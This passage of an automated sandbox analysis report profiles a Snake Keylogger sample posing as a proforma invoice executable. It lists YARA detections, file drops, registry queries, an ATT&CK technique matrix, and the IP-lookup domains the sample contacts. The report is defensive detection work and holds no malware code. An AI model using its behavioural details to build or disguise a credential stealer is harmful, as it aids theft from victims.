Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Queries volume information: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Queries volume information: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Speech\v4.0_4.0.0.0__31bf3856ad364e35\System.Speech.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Queries volume information: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation

Source: C:\Users\user\Desktop\PROFORMA + PENDENTES.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 11.2.PROFORMA + PENDENTES.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PROFORMA + PENDENTES.exe.395e8d0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PROFORMA + PENDENTES.exe.393deb0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PROFORMA + PENDENTES.exe.395e8d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PROFORMA + PENDENTES.exe.393deb0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.1626917322.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.1691929548.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1484282889.0000000003791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1630241690.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PROFORMA + PENDENTES.exe PID: 7924, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PROFORMA + PENDENTES.exe PID: 3636, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WYqxTmjfOgdZ.exe PID: 5420, type: MEMORYSTR

Source: Yara match	File source: 11.2.PROFORMA + PENDENTES.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PROFORMA + PENDENTES.exe.395e8d0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PROFORMA + PENDENTES.exe.393deb0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PROFORMA + PENDENTES.exe.395e8d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PROFORMA + PENDENTES.exe.393deb0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.1626917322.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1484282889.0000000003791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PROFORMA + PENDENTES.exe PID: 7924, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PROFORMA + PENDENTES.exe PID: 3636, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 11.2.PROFORMA + PENDENTES.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PROFORMA + PENDENTES.exe.395e8d0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PROFORMA + PENDENTES.exe.393deb0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PROFORMA + PENDENTES.exe.395e8d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PROFORMA + PENDENTES.exe.393deb0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.1626917322.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.1691929548.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1484282889.0000000003791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1630241690.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PROFORMA + PENDENTES.exe PID: 7924, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PROFORMA + PENDENTES.exe PID: 3636, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WYqxTmjfOgdZ.exe PID: 5420, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	111 Process Injection	1 Masquerading	OS Credential Dumping	11 Security Software Discovery	Remote Services	11 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	11 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	111 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	21 Obfuscated Files or Information	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Software Packing	DCSync	12 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 File Deletion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
PROFORMA + PENDENTES.exe	32%	ReversingLabs	Win32.Trojan.Generic
PROFORMA + PENDENTES.exe	100%	Avira	HEUR/AGEN.1305624
PROFORMA + PENDENTES.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	100%	Avira	HEUR/AGEN.1305624
C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe	32%	ReversingLabs	Win32.Trojan.Generic

Source	Detection	Scanner	Label	Link
http://crl.mv	0%	Avira URL Cloud	safe
http://checkip.dyndns.orgH	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	188.114.97.3	true	false	high
checkip.dyndns.com	158.101.44.242	true	false	high
18.31.95.13.in-addr.arpa	unknown	unknown	true	unknown
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	false		high
https://reallyfreegeoip.org/xml/155.94.241.187	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.orgH	WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org/q	PROFORMA + PENDENTES.exe, 00000000.00000002.1484282889.0000000003791000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1626917322.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
http://crl.mv	WYqxTmjfOgdZ.exe, 00000010.00000002.1694863278.0000000006560000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/#q=	PROFORMA + PENDENTES.exe, WYqxTmjfOgdZ.exe.0.dr	false		high
http://reallyfreegeoip.org	PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002F23000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002ECD000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002E52000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002DEC000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E14000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E50000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org	PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002F23000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002E7D000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002ECD000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002E3A000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002D59000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002D9C000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002DEC000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E14000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E50000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org	PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002F23000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002E7D000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002ECD000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002E3A000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002D59000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002D9C000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002DEC000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E14000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002D4D000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E22000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.com	PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002F23000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002ECD000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002E3A000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002D59000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002DEC000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E14000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E50000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	PROFORMA + PENDENTES.exe, 00000000.00000002.1483837011.0000000002791000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 0000000C.00000002.1547422246.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002C91000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/155.94.241.187$	PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002F23000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002E7D000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002ECD000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002D9C000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002DEC000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E14000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002E50000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/	PROFORMA + PENDENTES.exe, 00000000.00000002.1484282889.0000000003791000.00000004.00000800.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1626917322.0000000000402000.00000040.00000400.00020000.00000000.sdmp, PROFORMA + PENDENTES.exe, 0000000B.00000002.1630241690.0000000002E3A000.00000004.00000800.00020000.00000000.sdmp, WYqxTmjfOgdZ.exe, 00000010.00000002.1691929548.0000000002D59000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.97.3	reallyfreegeoip.org	European Union		13335	CLOUDFLARENETUS	false
